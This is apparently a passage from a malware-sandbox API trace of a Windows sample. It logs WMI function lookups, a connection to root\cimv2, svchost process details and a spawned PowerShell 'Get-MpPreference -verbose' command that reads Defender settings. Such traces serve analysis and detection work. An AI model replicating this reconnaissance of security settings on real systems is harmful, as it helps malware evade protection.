lpMultiByteStr="EndMethodEnumerationD\x1a\x1ftúWã¬\x94·tXíà\x08", lpUsedDefaultChar=0x0) returned 20 [0133.041] GetProcAddress (hModule=0x740e0000, lpProcName="EndMethodEnumeration") returned 0x740e1fd2 [0133.041] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="GetMethodQualifierSet", cchWideChar=21, lpMultiByteStr=0x8e0ea8c, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GetMethodQualifierSet\x1a\x1ftúWã¬\x94·tXíà\x08", lpUsedDefaultChar=0x0) returned 21 [0133.042] GetProcAddress (hModule=0x740e0000, lpProcName="GetMethodQualifierSet") returned 0x740e216c [0133.043] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="GetMethodOrigin", cchWideChar=15, lpMultiByteStr=0x8e0ea90, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GetMethodOrigin", lpUsedDefaultChar=0x0) returned 15 [0133.043] GetProcAddress (hModule=0x740e0000, lpProcName="GetMethodOrigin") returned 0x740e2156 [0133.044] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="QualifierSet_Get", cchWideChar=16, lpMultiByteStr=0x8e0ea90, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="QualifierSet_GetD\x1a\x1ftúWã¬\x94·tXíà\x08", lpUsedDefaultChar=0x0) returned 16 [0133.044] GetProcAddress (hModule=0x740e0000, lpProcName="QualifierSet_Get") returned 0x740e242c [0133.063] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="QualifierSet_Put", cchWideChar=16, lpMultiByteStr=0x8e0ea90, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="QualifierSet_PutD\x1a\x1ftúWã¬\x94·tXíà\x08", lpUsedDefaultChar=0x0) returned 16 [0133.063] GetProcAddress (hModule=0x740e0000, lpProcName="QualifierSet_Put") returned 0x740e247a [0133.075] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="QualifierSet_Delete", cchWideChar=19, lpMultiByteStr=0x8e0ea8c, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="QualifierSet_Delete", lpUsedDefaultChar=0x0) returned 19 [0133.075] GetProcAddress (hModule=0x740e0000, lpProcName="QualifierSet_Delete") returned 0x740e2409 [0133.076] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="QualifierSet_GetNames", cchWideChar=21, lpMultiByteStr=0x8e0ea8c, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="QualifierSet_GetNames\x1a\x1ftúWã¬\x94·tXíà\x08", lpUsedDefaultChar=0x0) returned 21 [0133.076] GetProcAddress (hModule=0x740e0000, lpProcName="QualifierSet_GetNames") returned 0x740e2448 [0133.088] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="QualifierSet_BeginEnumeration", cchWideChar=29, lpMultiByteStr=0x8e0ea84, cbMultiByte=31, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="QualifierSet_BeginEnumeration\x1a\x1ftúWã¬\x94·tXíà\x08", lpUsedDefaultChar=0x0) returned 29 [0133.088] GetProcAddress (hModule=0x740e0000, lpProcName="QualifierSet_BeginEnumeration") returned 0x740e23f6 [0133.089] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="QualifierSet_Next", cchWideChar=17, lpMultiByteStr=0x8e0ea90, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="QualifierSet_Next\x1a\x1ftúWã¬\x94·tXíà\x08", lpUsedDefaultChar=0x0) returned 17 [0133.089] GetProcAddress (hModule=0x740e0000, lpProcName="QualifierSet_Next") returned 0x740e245e [0133.100] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="QualifierSet_EndEnumeration", cchWideChar=27, lpMultiByteStr=0x8e0ea84, cbMultiByte=29, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="QualifierSet_EndEnumeration", lpUsedDefaultChar=0x0) returned 27 [0133.100] GetProcAddress (hModule=0x740e0000, lpProcName="QualifierSet_EndEnumeration") returned 0x740e241c [0133.101] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="GetCurrentApartmentType", cchWideChar=23, lpMultiByteStr=0x8e0ea88, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GetCurrentApartmentType", lpUsedDefaultChar=0x0) returned 23 [0133.101] GetProcAddress (hModule=0x740e0000, lpProcName="GetCurrentApartmentType") returned 0x740e2215 [0133.107] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="GetDemultiplexedStub", cchWideChar=20, lpMultiByteStr=0x8e0ea8c, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GetDemultiplexedStubD\x1a\x1ftúWã¬\x94·tXíà\x08", lpUsedDefaultChar=0x0) returned 20 [0133.107] GetProcAddress (hModule=0x740e0000, lpProcName="GetDemultiplexedStub") returned 0x740e20f3 [0133.116] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateInstanceEnumWmi", cchWideChar=21, lpMultiByteStr=0x8e0ea8c, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateInstanceEnumWmi\x1a\x1ftúWã¬\x94·tXíà\x08", lpUsedDefaultChar=0x0) returned 21 [0133.117] GetProcAddress (hModule=0x740e0000, lpProcName="CreateInstanceEnumWmi") returned 0x740e1ebb [0133.137] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateClassEnumWmi", cchWideChar=18, lpMultiByteStr=0x8e0ea90, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateClassEnumWmi\x1ftúWã¬\x94·tXíà\x08", lpUsedDefaultChar=0x0) returned 18 [0133.138] GetProcAddress (hModule=0x740e0000, lpProcName="CreateClassEnumWmi") returned 0x740e1e45 [0133.153] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ExecQueryWmi", cchWideChar=12, lpMultiByteStr=0x8e0ea94, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ExecQueryWmiD\x1a\x1ftúWã¬\x94·tXíà\x08", lpUsedDefaultChar=0x0) returned 12 [0133.153] GetProcAddress (hModule=0x740e0000, lpProcName="ExecQueryWmi") returned 0x740e205b [0133.178] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ExecNotificationQueryWmi", cchWideChar=24, lpMultiByteStr=0x8e0ea88, cbMultiByte=26, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ExecNotificationQueryWmiD\x1a\x1ftúWã¬\x94·tXíà\x08", lpUsedDefaultChar=0x0) returned 24 [0133.179] GetProcAddress (hModule=0x740e0000, lpProcName="ExecNotificationQueryWmi") returned 0x740e1fe2 [0133.180] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PutInstanceWmi", cchWideChar=14, lpMultiByteStr=0x8e0ea94, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PutInstanceWmi\x1ftúWã¬\x94·tXíà\x08", lpUsedDefaultChar=0x0) returned 14 [0133.180] GetProcAddress (hModule=0x740e0000, lpProcName="PutInstanceWmi") returned 0x740e235a [0133.199] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PutClassWmi", cchWideChar=11, lpMultiByteStr=0x8e0ea94, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PutClassWmi", lpUsedDefaultChar=0x0) returned 11 [0133.199] GetProcAddress (hModule=0x740e0000, lpProcName="PutClassWmi") returned 0x740e22da [0133.200] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloneEnumWbemClassObject", cchWideChar=24, lpMultiByteStr=0x8e0ea88, cbMultiByte=26, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloneEnumWbemClassObjectD\x1a\x1ftúWã¬\x94·tXíà\x08", lpUsedDefaultChar=0x0) returned 24 [0133.200] GetProcAddress (hModule=0x740e0000, lpProcName="CloneEnumWbemClassObject") returned 0x740e1d20 [0133.205] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ConnectServerWmi", cchWideChar=16, lpMultiByteStr=0x8e0ea90, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ConnectServerWmiD\x1a\x1ftúWã¬\x94·tXíà\x08", lpUsedDefaultChar=0x0) returned 16 [0133.205] GetProcAddress (hModule=0x740e0000, lpProcName="ConnectServerWmi") returned 0x740e1da3 [0133.225] CoCreateInstance (in: rclsid=0x740e1284*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x740e12e4*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppv=0x8e0f1b4 | out: ppv=0x8e0f1b4*=0x73b0b40) returned 0x0 [0133.226] WbemLocator:IWbemLocator:ConnectServer (in: This=0x73b0b40, strNetworkResource="\\\\.\\root\\cimv2", strUser=0x0, strPassword=0x0, strLocale="", lSecurityFlags=128, strAuthority="", pCtx=0x0, ppNamespace=0x8e0f248 | out: ppNamespace=0x8e0f248*=0x73bd334) returned 0x0 [0133.465] WbemLocator:IUnknown:QueryInterface (in: This=0x73bd334, riid=0x740e1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8e0f0e4 | out: ppvObject=0x8e0f0e4*=0x790b8c) returned 0x0 [0133.465] WbemLocator:IClientSecurity:QueryBlanket (in: This=0x790b8c, pProxy=0x73bd334, pAuthnSvc=0x8e0f134, pAuthzSvc=0x8e0f130, pServerPrincName=0x8e0f128, pAuthnLevel=0x8e0f12c, pImpLevel=0x8e0f11c, pAuthInfo=0x8e0f120, pCapabilites=0x8e0f124 | out: pAuthnSvc=0x8e0f134*=0xa, pAuthzSvc=0x8e0f130*=0x0, pServerPrincName=0x8e0f128, pAuthnLevel=0x8e0f12c*=0x6, pImpLevel=0x8e0f11c*=0x2, pAuthInfo=0x8e0f120, pCapabilites=0x8e0f124*=0x1) returned 0x0 [0133.465] WbemLocator:IUnknown:Release (This=0x790b8c) returned 0x1 [0133.465] WbemLocator:IUnknown:QueryInterface (in: This=0x73bd334, riid=0x740e10f4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8e0f0d8 | out: ppvObject=0x8e0f0d8*=0x790bac) returned 0x0 [0133.465] WbemLocator:IUnknown:QueryInterface (in: This=0x73bd334, riid=0x740e1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8e0f0d4 | out: ppvObject=0x8e0f0d4*=0x790b8c) returned 0x0 [0133.465] WbemLocator:IClientSecurity:SetBlanket (This=0x790b8c, pProxy=0x73bd334, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0 [0133.466] WbemLocator:IUnknown:Release (This=0x790b8c) returned 0x2 [0133.466] WbemLocator:IUnknown:Release (This=0x790bac) returned 0x1 [0133.466] CoTaskMemFree (pv=0x7900c0) [0133.466] WbemLocator:IUnknown:Release (This=0x73b0b40) returned 0x0 [0133.466] WbemLocator:IUnknown:QueryInterface (in: This=0x73bd334, riid=0x74b8e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8e0ecd4 | out: ppvObject=0x8e0ecd4*=0x790bac) returned 0x0 [0133.466] WbemLocator:IUnknown:QueryInterface (in: This=0x790bac, riid=0x74cbfc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x8e0ec90 | out: ppvObject=0x8e0ec90*=0x0) returned 0x80004002 [0133.466] WbemLocator:IUnknown:QueryInterface (in: This=0x790bac, riid=0x74cbfe90*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x8e0eaac | out: ppvObject=0x8e0eaac*=0x0) returned 0x80004002 [0133.466] WbemLocator:IUnknown:AddRef (This=0x790bac) returned 0x3 [0133.467] WbemLocator:IUnknown:QueryInterface (in: This=0x790bac, riid=0x74cbf90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x8e0e5ec | out: ppvObject=0x8e0e5ec*=0x0) returned 0x80004002 [0133.467] WbemLocator:IUnknown:QueryInterface (in: This=0x790bac, riid=0x74cbf860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x8e0e59c | out: ppvObject=0x8e0e59c*=0x0) returned 0x80004002 [0133.467] WbemLocator:IUnknown:QueryInterface (in: This=0x790bac, riid=0x74cac350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8e0e5a8 | out: ppvObject=0x8e0e5a8*=0x790b0c) returned 0x0 [0133.467] WbemLocator:IMarshal:GetUnmarshalClass (in: This=0x790b0c, riid=0x74b8e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x8e0e5b0 | out: pCid=0x8e0e5b0*(Data1=0x17, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0133.467] WbemLocator:IUnknown:Release (This=0x790b0c) returned 0x3 [0133.467] CoGetContextToken (in: pToken=0x8e0e608 | out: pToken=0x8e0e608) returned 0x0 [0133.467] CoGetContextToken (in: pToken=0x8e0ea10 | out: pToken=0x8e0ea10) returned 0x0 [0133.467] WbemLocator:IUnknown:QueryInterface (in: This=0x790bac, riid=0x74cbfb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8e0eaa0 | out: ppvObject=0x8e0eaa0*=0x790b94) returned 0x0 [0133.528] WbemLocator:IRpcOptions:Query (in: This=0x790b94, pPrx=0x790bac, dwProperty=2, pdwValue=0x8e0eac8 | out: pdwValue=0x8e0eac8) returned 0x80004002 [0133.528] WbemLocator:IUnknown:Release (This=0x790b94) returned 0x3 [0133.529] WbemLocator:IUnknown:Release (This=0x790bac) returned 0x2 [0133.529] CoGetContextToken (in: pToken=0x8e0efe8 | out: pToken=0x8e0efe8) returned 0x0 [0133.529] CoGetContextToken (in: pToken=0x8e0ef48 | out: pToken=0x8e0ef48) returned 0x0 [0133.529] WbemLocator:IUnknown:QueryInterface (in: This=0x790bac, riid=0x8e0f018*(Data1=0x9556dc99, Data2=0x828c, Data3=0x11cf, Data4=([0]=0xa3, [1]=0x7e, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x32, [6]=0x40, [7]=0xc7)), ppvObject=0x8e0f014 | out: ppvObject=0x8e0f014*=0x73bd334) returned 0x0 [0133.529] WbemLocator:IUnknown:AddRef (This=0x73bd334) returned 0x4 [0133.529] WbemLocator:IUnknown:Release (This=0x73bd334) returned 0x3 [0133.529] WbemLocator:IUnknown:Release (This=0x73bd334) returned 0x2 [0133.534] SysStringLen (param_1=0x0) returned 0x0 [0133.535] CoUninitialize () Thread: id = 234 os_tid = 0x5a0 Thread: id = 235 os_tid = 0x32c [0133.547] CoGetContextToken (in: pToken=0x90df358 | out: pToken=0x90df358) returned 0x0 [0133.547] CoGetContextToken (in: pToken=0x90df348 | out: pToken=0x90df348) returned 0x0 [0133.547] CoGetMarshalSizeMax (in: pulSize=0x90df304, riid=0x74b8e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pUnk=0x790bac, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0 | out: pulSize=0x90df304) returned 0x0 [0133.547] CoMarshalInterface (pStm=0x76a9a0, riid=0x74b8e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pUnk=0x790bac, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0) returned 0x0 Thread: id = 244 os_tid = 0x638 Thread: id = 245 os_tid = 0x67c [0147.820] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0147.821] ResetEvent (hEvent=0x37c) returned 1 [0254.716] shutdown (s=0x49c, how=2) returned 0 [0254.718] setsockopt (s=0x49c, level=65535, optname=128, optval="\x01", optlen=4) returned 0 [0254.718] closesocket (s=0x49c) returned 0 Thread: id = 289 os_tid = 0x138 [0168.626] SleepEx (dwMilliseconds=0x1, bAlertable=0) returned 0x0 [0170.821] SleepEx (dwMilliseconds=0x1, bAlertable=0) returned 0x0 [0171.183] SleepEx (dwMilliseconds=0x1, bAlertable=0) returned 0x0 [0180.640] SleepEx (dwMilliseconds=0x1, bAlertable=0) returned 0x0 [0181.155] SleepEx (dwMilliseconds=0x1, bAlertable=0) returned 0x0 [0199.944] SleepEx (dwMilliseconds=0x1, bAlertable=0) returned 0x0 [0200.184] SleepEx (dwMilliseconds=0x1, bAlertable=0) returned 0x0 [0200.464] SleepEx (dwMilliseconds=0x1, bAlertable=0) returned 0x0 [0200.824] SleepEx (dwMilliseconds=0x1, bAlertable=0) returned 0x0 [0219.718] SleepEx (dwMilliseconds=0x1, bAlertable=0) returned 0x0 [0220.109] SleepEx (dwMilliseconds=0x1, bAlertable=0) returned 0x0 [0227.700] SleepEx (dwMilliseconds=0x1, bAlertable=0) returned 0x0 [0235.180] SleepEx (dwMilliseconds=0x1, bAlertable=0) returned 0x0 [0239.031] SleepEx (dwMilliseconds=0x1, bAlertable=0) returned 0x0 [0263.398] CoGetContextToken (in: pToken=0x6daf87c | out: pToken=0x6daf87c) returned 0x0 [0263.398] IUnknown:QueryInterface (in: This=0x73c138, riid=0x74cbd8c4*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6daf8a0 | out: ppvObject=0x6daf8a0*=0x73c144) returned 0x0 [0263.398] IComThreadingInfo:GetCurrentThreadType (in: This=0x73c144, pThreadType=0x6daf8cc | out: pThreadType=0x6daf8cc*=0) returned 0x0 [0263.398] IUnknown:Release (This=0x73c144) returned 0x1 Thread: id = 290 os_tid = 0x6f8 Thread: id = 293 os_tid = 0x480 Thread: id = 343 os_tid = 0x304 [0264.577] SleepEx (dwMilliseconds=0x1, bAlertable=0) returned 0x0 [0265.157] SleepEx (dwMilliseconds=0x1, bAlertable=0) returned 0x0 [0265.734] SleepEx (dwMilliseconds=0x1, bAlertable=0) returned 0x0 [0266.189] SleepEx (dwMilliseconds=0x1, bAlertable=0) returned 0x0 Process: id = "11" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x9e4e000" os_pid = "0x370" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "rpc_server" parent_id = "9" os_parent_pid = "0x1c8" cmd_line = "C:\\Windows\\system32\\svchost.exe -k netsvcs" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\BDESVC" [0xa], "NT SERVICE\\BITS" [0xa], "NT SERVICE\\CertPropSvc" [0xa], "NT SERVICE\\EapHost" [0xa], "NT SERVICE\\hkmsvc" [0xa], "NT SERVICE\\IKEEXT" [0xa], "NT SERVICE\\iphlpsvc" [0xa], "NT SERVICE\\LanmanServer" [0xa], "NT SERVICE\\MMCSS" [0xe], "NT SERVICE\\MSiSCSI" [0xa], "NT SERVICE\\RasAuto" [0xa], "NT SERVICE\\RasMan" [0xa], "NT SERVICE\\RemoteAccess" [0xa], "NT SERVICE\\Schedule" [0xa], "NT SERVICE\\SCPolicySvc" [0xa], "NT SERVICE\\SENS" [0xa], "NT SERVICE\\SessionEnv" [0xa], "NT SERVICE\\SharedAccess" [0xa], "NT SERVICE\\ShellHWDetection" [0xa], "NT SERVICE\\wercplsupport" [0xa], "NT SERVICE\\Winmgmt" [0xa], "NT SERVICE\\wuauserv" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000d096" [0xc0000007], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Thread: id = 161 os_tid = 0x11c Thread: id = 162 os_tid = 0x428 Thread: id = 163 os_tid = 0x6ac Thread: id = 164 os_tid = 0x48c Thread: id = 165 os_tid = 0x468 Thread: id = 166 os_tid = 0x448 Thread: id = 167 os_tid = 0x420 Thread: id = 168 os_tid = 0x41c Thread: id = 169 os_tid = 0x418 Thread: id = 170 os_tid = 0x40c Thread: id = 171 os_tid = 0x128 Thread: id = 172 os_tid = 0xf0 Thread: id = 173 os_tid = 0xc8 Thread: id = 174 os_tid = 0x3f4 Thread: id = 175 os_tid = 0x3e8 Thread: id = 176 os_tid = 0x39c Thread: id = 177 os_tid = 0x398 Thread: id = 178 os_tid = 0x394 Thread: id = 179 os_tid = 0x390 Thread: id = 180 os_tid = 0x37c Thread: id = 181 os_tid = 0x374 Thread: id = 182 os_tid = 0x6c4 Thread: id = 183 os_tid = 0x6d4 Thread: id = 184 os_tid = 0x6e4 Thread: id = 185 os_tid = 0x6e8 Thread: id = 186 os_tid = 0x6ec Thread: id = 187 os_tid = 0x6f0 Thread: id = 188 os_tid = 0x700 Thread: id = 189 os_tid = 0x70c Thread: id = 190 os_tid = 0x71c Thread: id = 191 os_tid = 0x724 Thread: id = 192 os_tid = 0x728 Thread: id = 193 os_tid = 0x734 Thread: id = 194 os_tid = 0x738 Thread: id = 195 os_tid = 0x740 Thread: id = 196 os_tid = 0x750 Thread: id = 197 os_tid = 0x754 Thread: id = 198 os_tid = 0x758 Thread: id = 199 os_tid = 0x75c Thread: id = 200 os_tid = 0x760 Thread: id = 201 os_tid = 0x764 Thread: id = 217 os_tid = 0x7a8 Thread: id = 218 os_tid = 0x7c0 Thread: id = 219 os_tid = 0x7c8 Thread: id = 220 os_tid = 0x7cc Thread: id = 221 os_tid = 0x7d4 Thread: id = 223 os_tid = 0x7f4 Thread: id = 294 os_tid = 0x550 Thread: id = 295 os_tid = 0x534 Thread: id = 296 os_tid = 0x54c Thread: id = 297 os_tid = 0x538 Thread: id = 298 os_tid = 0x52c Thread: id = 299 os_tid = 0x548 Thread: id = 300 os_tid = 0x564 Thread: id = 301 os_tid = 0x510 Thread: id = 302 os_tid = 0x504 Thread: id = 303 os_tid = 0x630 Thread: id = 304 os_tid = 0x35c Thread: id = 305 os_tid = 0x62c Thread: id = 306 os_tid = 0x60c Thread: id = 307 os_tid = 0x61c Thread: id = 311 os_tid = 0x180 Thread: id = 312 os_tid = 0x23c Thread: id = 313 os_tid = 0x240 Thread: id = 314 os_tid = 0x244 Thread: id = 315 os_tid = 0x2a8 Thread: id = 316 os_tid = 0x2cc Thread: id = 317 os_tid = 0x20c Thread: id = 318 os_tid = 0x10c Thread: id = 341 os_tid = 0x4e0 Thread: id = 342 os_tid = 0x30c Process: id = "12" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x2bbf3000" os_pid = "0x250" os_integrity_level = "0x4000" os_privileges = "0x60b00080" monitor_reason = "rpc_server" parent_id = "11" os_parent_pid = "0x1c8" cmd_line = "C:\\Windows\\system32\\svchost.exe -k DcomLaunch" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\DcomLaunch" [0xa], "NT SERVICE\\PlugPlay" [0xe], "NT SERVICE\\Power" [0xa], "NT AUTHORITY\\Logon Session 00000000:00006e74" [0xc000000f], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Thread: id = 202 os_tid = 0x784 Thread: id = 203 os_tid = 0x704 Thread: id = 204 os_tid = 0x318 Thread: id = 205 os_tid = 0x2a8 Thread: id = 206 os_tid = 0x2a0 Thread: id = 207 os_tid = 0x29c Thread: id = 208 os_tid = 0x284 Thread: id = 209 os_tid = 0x280 Thread: id = 210 os_tid = 0x27c Thread: id = 211 os_tid = 0x278 Thread: id = 212 os_tid = 0x274 Thread: id = 213 os_tid = 0x268 Thread: id = 214 os_tid = 0x260 Thread: id = 215 os_tid = 0x25c Thread: id = 216 os_tid = 0x254 Thread: id = 308 os_tid = 0x344 Thread: id = 310 os_tid = 0x310 Process: id = "13" image_name = "powershell.exe" filename = "c:\\windows\\syswow64\\windowspowershell\\v1.0\\powershell.exe" page_root = "0x6536c000" os_pid = "0x328" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "10" os_parent_pid = "0x6b8" cmd_line = "\"powershell\" Get-MpPreference -verbose" cur_dir = "C:\\Windows\\system32\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea31" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 236 os_tid = 0x604 [0135.894] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0136.116] SysStringByteLen (bstr="Microsoft.PowerShell.ConsoleHost, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, ProcessorArchitecture=msil") returned 0xfe [0136.116] SysStringByteLen (bstr="Microsoft.PowerShell.ConsoleHost, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, ProcessorArchitecture=msil") returned 0xfe [0136.116] SysStringByteLen (bstr="Microsoft.PowerShell.UnmanagedPSEntry") returned 0x4a [0136.116] SysStringByteLen (bstr="Microsoft.PowerShell.UnmanagedPSEntry") returned 0x4a [0136.963] GetVersionExW (in: lpVersionInformation=0x2e48e8*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x2e48e8*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0136.963] GetLastError () returned 0x2 [0136.964] GetVersionExW (in: lpVersionInformation=0x2e48e8*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x0, 